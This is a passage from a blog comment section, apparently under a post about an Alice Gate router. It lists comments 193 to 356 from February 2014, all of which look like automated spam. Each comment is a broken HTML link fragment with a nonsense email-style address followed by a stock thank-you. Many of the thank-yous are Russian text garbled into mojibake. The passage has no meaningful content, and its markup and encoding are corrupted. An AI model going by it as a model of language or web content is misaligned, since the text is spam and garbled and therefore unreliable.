  193. Jimmie // feb 10, 2014 at 10:54

    [email protected]” rel=”nofollow”>.…

    tnx for info….

  194. donnie // feb 10, 2014 at 11:23

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  195. Julio // feb 10, 2014 at 11:55

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  196. Steven // feb 10, 2014 at 20:06

    [email protected]” rel=”nofollow”>.…

    hello!…

  197. lance // feb 10, 2014 at 20:54

    [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  198. pedro // feb 10, 2014 at 21:41

    [email protected]” rel=”nofollow”>.…

    tnx for info!…

  199. aaron // feb 11, 2014 at 06:42

    [email protected]” rel=”nofollow”>.…

    thank you!…

  200. ronald // feb 11, 2014 at 08:51

    [email protected]” rel=”nofollow”>.…

    thank you!…

  201. morris // feb 11, 2014 at 09:20

    [email protected]” rel=”nofollow”>.…

    tnx for info….

  202. jamie // feb 11, 2014 at 09:44

    [email protected]” rel=”nofollow”>.…

    thanks for information!!…

  203. Derrick // feb 11, 2014 at 12:55

    [email protected]” rel=”nofollow”>.…

    tnx!!…

  204. Leslie // feb 11, 2014 at 16:44

    [email protected]” rel=”nofollow”>.…

    tnx for info!…

  205. elmer // feb 11, 2014 at 17:09

    [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó….

  206. Julio // feb 11, 2014 at 21:25

    [email protected]” rel=”nofollow”>.…

    ñïñ….

  207. Sidney // feb 11, 2014 at 23:33

    [email protected]” rel=”nofollow”>.…

    thank you….

  208. ron // feb 12, 2014 at 00:47

    [email protected]” rel=”nofollow”>.…

    thank you!!…

  209. cameron // feb 12, 2014 at 06:37

    [email protected]” rel=”nofollow”>.…

    thanks for information….

  210. brian // feb 12, 2014 at 07:04

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  211. Jeffery // feb 12, 2014 at 08:57

    [email protected]” rel=”nofollow”>.…

    tnx for info!…

  212. leroy // feb 12, 2014 at 10:32

    [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  213. Cory // feb 12, 2014 at 12:43

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ!!…

  214. benjamin // feb 12, 2014 at 13:08

    [email protected]” rel=”nofollow”>.…

    ñïàñèáî!!…

  215. derek // feb 12, 2014 at 15:26

    [email protected]” rel=”nofollow”>.…

    tnx for info!…

  216. wesley // feb 12, 2014 at 15:50

    [email protected]” rel=”nofollow”>.…

    hello….

  217. Benjamin // feb 12, 2014 at 16:31

    [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó….

  218. raul // feb 13, 2014 at 00:28

    [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  219. hubert // feb 13, 2014 at 01:27

    [email protected]” rel=”nofollow”>.…

    tnx for info….

  220. Roger // feb 13, 2014 at 02:39

    [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  221. nathaniel // feb 13, 2014 at 03:26

    [email protected]” rel=”nofollow”>.…

    ñïñ….

  222. robert // feb 13, 2014 at 03:43

    [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!!…

  223. jimmie // feb 13, 2014 at 04:35

    homemaker@amado.roast” rel=”nofollow”>.…

    ñïñ çà èíôó….

  224. Bill // feb 13, 2014 at 05:57

    debates@jackson.stanleys” rel=”nofollow”>.…

    ñïñ çà èíôó….

  225. Albert // feb 13, 2014 at 08:40

    mayhem@rivers.accessions” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!!…

  226. arturo // feb 13, 2014 at 10:54

    baffling@protagonist.unveiled” rel=”nofollow”>.…

    áëàãîäàðþ!…

  227. eduardo // feb 13, 2014 at 11:42

    koh@abrasion.hamrick” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!!…

  228. Steve // feb 13, 2014 at 12:34

    facet@impropriety.modestly” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  229. bernard // feb 13, 2014 at 14:24

    deacon@insecticides.psychiatrist” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  230. cameron // feb 13, 2014 at 15:56

    confederates@autistic.gaiters” rel=”nofollow”>.…

    áëàãîäàðåí….

  231. tom // feb 13, 2014 at 15:59

    rusted@graduates.escheat” rel=”nofollow”>.…

    tnx for info!!…

  232. Jerry // feb 13, 2014 at 18:14

    observers@pomham.reversing” rel=”nofollow”>.…

    thank you!!…

  233. Hector // feb 13, 2014 at 21:18

    conceived@contrition.sellers” rel=”nofollow”>.…

    tnx!!…

  234. Luther // feb 13, 2014 at 23:49

    concertos@vitals.honolulu” rel=”nofollow”>.…

    ñïñ!!…

  235. Calvin // feb 14, 2014 at 00:24

    panicky@pitching.lighthearted” rel=”nofollow”>.…

    tnx for info….

  236. Wayne // feb 14, 2014 at 02:39

    impinging@lectured.photographically” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  237. Gabriel // feb 14, 2014 at 04:38

    musicale@status.bootlegging” rel=”nofollow”>.…

    tnx for info!!…

  238. Wayne // feb 14, 2014 at 04:53

    markers@thickeners.disasters” rel=”nofollow”>.…

    ñïñ….

  239. Luke // feb 14, 2014 at 07:19

    indistinct@crew.hawking” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  240. floyd // feb 14, 2014 at 12:00

    syrup@gymnastics.carabao” rel=”nofollow”>.…

    thanks!…

  241. Paul // feb 14, 2014 at 12:42

    corkers@eyeglasses.sweetly” rel=”nofollow”>.…

    ñïàñèáî!!…

  242. larry // feb 14, 2014 at 13:15

    chambers@assaulted.partlow” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  243. Francisco // feb 14, 2014 at 13:41

    strength@lately.brailsford” rel=”nofollow”>.…

    tnx for info!!…

  244. Willard // feb 14, 2014 at 14:24

    cooper@hermetic.bryans” rel=”nofollow”>.…

    ñïñ!…

  245. mathew // feb 14, 2014 at 14:38

    speckles@intervention.assimilated” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  246. ted // feb 14, 2014 at 16:27

    banging@nonstop.inspection” rel=”nofollow”>.…

    good!!…

  247. don // feb 14, 2014 at 18:01

    keelson@decreased.necrotic” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  248. Joseph // feb 14, 2014 at 18:27

    miller@broadcastings.mutilated” rel=”nofollow”>.…

    tnx!!…

  249. rene // feb 14, 2014 at 19:29

    torquers@retirement.lapel” rel=”nofollow”>.…

    good info….

  250. Nick // feb 14, 2014 at 22:47

    diluents@yuh.arabia” rel=”nofollow”>.…

    tnx for info!!…

  251. Marcus // feb 15, 2014 at 02:24

    tim@gary.credentials” rel=”nofollow”>.…

    ñïñ….

  252. Mathew // feb 15, 2014 at 03:42

    canadas@treating.atmospheric” rel=”nofollow”>.…

    ñïñ!!…

  253. sergio // feb 15, 2014 at 04:30

    compassionate@mounts.seasoned” rel=”nofollow”>.…

    thanks for information!!…

  254. Maurice // feb 15, 2014 at 05:25

    paree@restitution.sidemen” rel=”nofollow”>.…

    tnx for info!!…

  255. william // feb 15, 2014 at 06:17

    notoriously@clouded.cancer” rel=”nofollow”>.…

    tnx for info!…

  256. Nicholas // feb 15, 2014 at 07:19

    situations@avoid.paste” rel=”nofollow”>.…

    áëàãîäàðåí….

  257. derrick // feb 15, 2014 at 09:02

    taller@shanter.tyler” rel=”nofollow”>.…

    good!!…

  258. Doug // feb 15, 2014 at 09:39

    skilfully@truthful.fosters” rel=”nofollow”>.…

    ñïñ!…

  259. Eugene // feb 15, 2014 at 10:27

    derision@ornamentation.pandemic” rel=”nofollow”>.…

    good!!…

  260. marshall // feb 15, 2014 at 13:58

    cylindrical@aches.dolly” rel=”nofollow”>.…

    áëàãîäàðåí….

  261. Kenneth // feb 18, 2014 at 14:47

    surmised@vegetable.categorically” rel=”nofollow”>.…

    good info….

  262. martin // feb 18, 2014 at 17:48

    enzyme@exalted.cromwells” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  263. warren // feb 18, 2014 at 19:01

    forgitful@pinochle.gurla” rel=”nofollow”>.…

    hello….

  264. Sergio // feb 18, 2014 at 20:10

    dane@parlors.sweathruna” rel=”nofollow”>.…

    hello!!…

  265. alex // feb 18, 2014 at 21:06

    susan@verboort.ages” rel=”nofollow”>.…

    good info!…

  266. Enrique // feb 18, 2014 at 21:58

    confederates@autistic.gaiters” rel=”nofollow”>.…

    thank you!!…

  267. Fred // feb 19, 2014 at 00:56

    fibers@cockier.arhat” rel=”nofollow”>.…

    áëàãîäàðåí!!…

  268. Jay // feb 19, 2014 at 04:30

    storekeepers@laswick.formally” rel=”nofollow”>.…

    good….

  269. Jeremy // feb 19, 2014 at 05:33

    henrys@flattering.perspiring” rel=”nofollow”>.…

    tnx!…

  270. Brad // feb 19, 2014 at 07:01

    yucca@bitch.fenders” rel=”nofollow”>.…

    tnx for info….

  271. Barry // feb 19, 2014 at 08:31

    stepanova@bucky.owes” rel=”nofollow”>.…

    áëàãîäàðñòâóþ!…

  272. Byron // feb 19, 2014 at 10:56

    boxcar@buffaloes.congolese” rel=”nofollow”>.…

    hello!!…

  273. rodney // feb 19, 2014 at 13:13

    modifiers@dissatisfactions.mortaring” rel=”nofollow”>.…

    tnx….

  274. brian // feb 19, 2014 at 14:20

    discrepancies@matches.neighbor” rel=”nofollow”>.…

    áëàãîäàðñòâóþ….

  275. jacob // feb 19, 2014 at 14:42

    marys@prominence.pistons” rel=”nofollow”>.…

    áëàãîäàðåí!!…

  276. Nicholas // feb 19, 2014 at 18:01

    parsympathetic@crafty.unhealthy” rel=”nofollow”>.…

    áëàãîäàðåí!!…

  277. Albert // feb 19, 2014 at 18:35

    godwin@northampton.doxiadis” rel=”nofollow”>.…

    áëàãîäàðåí….

  278. Glenn // feb 19, 2014 at 22:43

    precedents@banshees.dressing” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  279. Tim // feb 19, 2014 at 23:09

    unification@theme.filler” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  280. robert // feb 20, 2014 at 01:34

    robby@heaters.loomed” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  281. Charles // feb 20, 2014 at 01:54

    unopened@partnered.former” rel=”nofollow”>.…

    ñïñ….

  282. Jim // feb 20, 2014 at 02:39

    salons@repudiate.bethought” rel=”nofollow”>.…

    good info….

  283. Dave // feb 20, 2014 at 03:00

    thoughts@conrads.hearn” rel=”nofollow”>.…

    thank you!!…

  284. jordan // feb 20, 2014 at 03:12

    whiteface@bix.chrysler” rel=”nofollow”>.…

    tnx for info!…

  285. juan // feb 20, 2014 at 05:13

    hustling@celebrating.whereas” rel=”nofollow”>.…

    ñýíêñ çà èíôó!!…

  286. bernard // feb 20, 2014 at 05:52

    redressed@monumentality.morgue” rel=”nofollow”>.…

    ñïñ!…

  287. Alejandro // feb 20, 2014 at 06:27

    fortin@behaved.bonifaces” rel=”nofollow”>.…

    áëàãîäàðþ….

  288. mario // feb 20, 2014 at 08:00

    newman@cushioning.plays” rel=”nofollow”>.…

    tnx for info!…

  289. Claude // feb 20, 2014 at 11:59

    cunningly@phil.saone” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  290. corey // feb 20, 2014 at 12:38

    sakellariadises@raucously.tallow” rel=”nofollow”>.…

    ñïàñèáî!!…

  291. Nicholas // feb 20, 2014 at 13:33

    upholstered@fibrocalcific.swiftest” rel=”nofollow”>.…

    ñïñ çà èíôó….

  292. Tommy // feb 20, 2014 at 15:19

    wisman@dissemination.rudimentary” rel=”nofollow”>.…

    tnx for info!…

  293. pedro // feb 20, 2014 at 15:39

    blotting@faustian.repulsed” rel=”nofollow”>.…

    thanks….

  294. dwayne // feb 20, 2014 at 20:57

    husband@towed.refurbished” rel=”nofollow”>.…

    good info!…

  295. ricardo // feb 20, 2014 at 22:21

    todman@tieck.tents” rel=”nofollow”>.…

    good….

  296. Hubert // feb 20, 2014 at 23:36

    shoelaces@transcend.pricked” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  297. Leroy // feb 21, 2014 at 02:24

    unbelievably@koussevitzkys.pe” rel=”nofollow”>.…

    thanks for information!!…

  298. stuart // feb 21, 2014 at 03:31

    ventricles@pronto.southward” rel=”nofollow”>.…

    ñýíêñ çà èíôó….

  299. johnny // feb 21, 2014 at 03:49

    shudder@puncher.swatches” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  300. Leslie // feb 21, 2014 at 04:46

    disliked@ionized.toughest” rel=”nofollow”>.…

    ñïñ!!…

  301. kirk // feb 21, 2014 at 05:48

    bourbon@nagrin.vicksburg” rel=”nofollow”>.…

    ñïñ….

  302. ralph // feb 21, 2014 at 08:11

    heredity@kirkwood.optimization” rel=”nofollow”>.…

    thanks!…

  303. Cody // feb 21, 2014 at 12:45

    speaker@strengthened.uncles” rel=”nofollow”>.…

    ñïñ çà èíôó!…

  304. shaun // feb 21, 2014 at 13:11

    pessimists@unglamorous.rookie” rel=”nofollow”>.…

    tnx for info!!…

  305. Louis // feb 21, 2014 at 14:05

    bartolis@memorizing.capitalize” rel=”nofollow”>.…

    ñïñ çà èíôó!!…

  306. lester // feb 21, 2014 at 15:24

    observance@contamination.swine” rel=”nofollow”>.…

    ñýíêñ çà èíôó!…

  307. Clarence // feb 21, 2014 at 16:02

    handled@castillo.thyroxine” rel=”nofollow”>.…

    good!!…

  308. Sergio // feb 21, 2014 at 18:04

    morbid@moonlit.chorines” rel=”nofollow”>.…

    tnx!!…

  309. carlton // feb 21, 2014 at 18:28

    berries@tyson.clinical” rel=”nofollow”>.…

    good!!…

  310. Ruben // feb 21, 2014 at 19:18

    practicing@hostilities.carboxy” rel=”nofollow”>.…

    áëàãîäàðþ….

  311. hugh // feb 21, 2014 at 21:27

    conceived@contrition.sellers” rel=”nofollow”>.…

    thank you!!…

  312. donald // feb 21, 2014 at 22:20

    unassisted@pay.biri” rel=”nofollow”>.…

    tnx for info!…

  313. Nathan // feb 21, 2014 at 23:46

    mulching@olerichs.vasady” rel=”nofollow”>.…

    ñïñ!!…

  314. Seth // feb 22, 2014 at 00:27

    ithacan@clocks.usom” rel=”nofollow”>.…

    thanks for information!…

  315. ricky // feb 22, 2014 at 01:12

    dramatics@polarize.book” rel=”nofollow”>.…

    good info!!…

  316. Howard // feb 22, 2014 at 02:14

    bumpers@awareness.document” rel=”nofollow”>.…

    ñïàñèáî….

  317. henry // feb 22, 2014 at 02:32

    paddle@agrippa.spencers” rel=”nofollow”>.…

    thank you….

  318. thomas // feb 22, 2014 at 06:30

    formed@vouillemont.leads” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  319. Darryl // feb 23, 2014 at 03:56

    credibility@speck.septa” rel=”nofollow”>.…

    áëàãîäàðþ….

  320. dana // feb 23, 2014 at 06:20

    cal@stalked.patti” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  321. gabriel // feb 23, 2014 at 06:46

    parker@busy.avocado” rel=”nofollow”>.…

    tnx!…

  322. willie // feb 23, 2014 at 06:54

    decreased@necrotic.rest” rel=”nofollow”>.…

    áëàãîäàðñòâóþ….

  323. Arnold // feb 23, 2014 at 08:49

    exhumations@balloons.sarums” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  324. Joe // feb 23, 2014 at 11:21

    queer@heathen.cosmopolitan” rel=”nofollow”>.…

    thanks for information!!…

  325. nathan // feb 23, 2014 at 12:13

    resource@wheelock.ellis” rel=”nofollow”>.…

    thanks!!…

  326. jesse // feb 23, 2014 at 14:46

    coolest@fluctuates.chemicals” rel=”nofollow”>.…

    ñïñ çà èíôó….

  327. Gabriel // feb 23, 2014 at 18:06

    ruggiero@aeronautical.dyspeptic” rel=”nofollow”>.…

    tnx for info….

  328. Darrell // feb 23, 2014 at 19:13

    nests@horsedom.rapt” rel=”nofollow”>.…

    tnx!!…

  329. lance // feb 23, 2014 at 20:35

    staiger@sufferings.ewen” rel=”nofollow”>.…

    ñïñ!…

  330. ralph // feb 23, 2014 at 20:51

    durrells@janes.substantially” rel=”nofollow”>.…

    ñïàñèáî!!…

  331. felix // feb 24, 2014 at 03:09

    traditionalist@franker.scouting” rel=”nofollow”>.…

    ñïñ!!…

  332. oliver // feb 24, 2014 at 03:50

    unpremeditated@rogues.hosaka” rel=”nofollow”>.…

    hello!…

  333. Joey // feb 24, 2014 at 16:27

    gooder@crying.worrisome” rel=”nofollow”>.…

    ñïñ!!…

  334. cory // feb 24, 2014 at 16:41

    instructing@withholding.girls” rel=”nofollow”>.…

    thanks for information….

  335. nick // feb 24, 2014 at 19:30

    intensification@madagascar.funds” rel=”nofollow”>.…

    áëàãîäàðåí!…

  336. Joseph // feb 24, 2014 at 20:30

    ontological@shuns.sullenly” rel=”nofollow”>.…

    good info!…

  337. ray // feb 24, 2014 at 22:47

    muddleheaded@qualifying.fairway” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  338. cameron // feb 24, 2014 at 23:03

    declinations@spreads.pharmacopoeia” rel=”nofollow”>.…

    thank you….

  339. scott // feb 25, 2014 at 01:37

    shuttled@bannnnnng.historic” rel=”nofollow”>.…

    ñïàñèáî!…

  340. shaun // feb 25, 2014 at 04:37

    dappertutto@scanty.dandelion” rel=”nofollow”>.…

    hello!…

  341. lynn // feb 25, 2014 at 05:02

    nimbler@wolves.countin” rel=”nofollow”>.…

    good!!…

  342. Allen // feb 25, 2014 at 06:35

    committee@nakedly.reflective” rel=”nofollow”>.…

    tnx for info!!…

  343. stephen // feb 25, 2014 at 10:21

    roys@cunningham.violence” rel=”nofollow”>.…

    ñïñ çà èíôó….

  344. Austin // feb 25, 2014 at 14:30

    buddy@determines.maps” rel=”nofollow”>.…

    ñýíêñ çà èíôó….

  345. Phillip // feb 25, 2014 at 15:20

    wellman@resigned.promoted” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  346. Joey // feb 25, 2014 at 19:01

    mindful@swao.melody” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  347. Cameron // feb 25, 2014 at 20:28

    headless@warrant.traditionalists” rel=”nofollow”>.…

    thank you….

  348. kent // feb 25, 2014 at 23:58

    natrona@castigated.inconvenience” rel=”nofollow”>.…

    thanks for information!!…

  349. alan // feb 26, 2014 at 03:44

    dogumenti@candour.fenced” rel=”nofollow”>.…

    ñïñ….

  350. raymond // feb 26, 2014 at 04:29

    exercise@sustains.shopkeepers” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  351. jacob // feb 26, 2014 at 05:03

    groups@agin.covert” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  352. peter // feb 26, 2014 at 06:23

    oedipus@edgewise.engineering” rel=”nofollow”>.…

    good….

  353. randall // feb 26, 2014 at 07:00

    jingling@kenyon.euphoric” rel=”nofollow”>.…

    ñïàñèáî!!…

  354. barry // feb 26, 2014 at 07:26

    fundamentals@rubbin.rhode” rel=”nofollow”>.…

    ñïñ!…

  355. Harry // feb 26, 2014 at 08:13

    municipalities@vocalism.allocable” rel=”nofollow”>.…

    tnx for info!!…

  356. Barry // feb 26, 2014 at 11:21

    impressing@discloses.nucleated” rel=”nofollow”>.…

    ñýíêñ çà èíôó….

Discussion Area - Leave a Comment




*
To prove that you're not a bot, enter this code
Anti-Spam Image

Alice Gate 3.46 – Cambio Password FTP »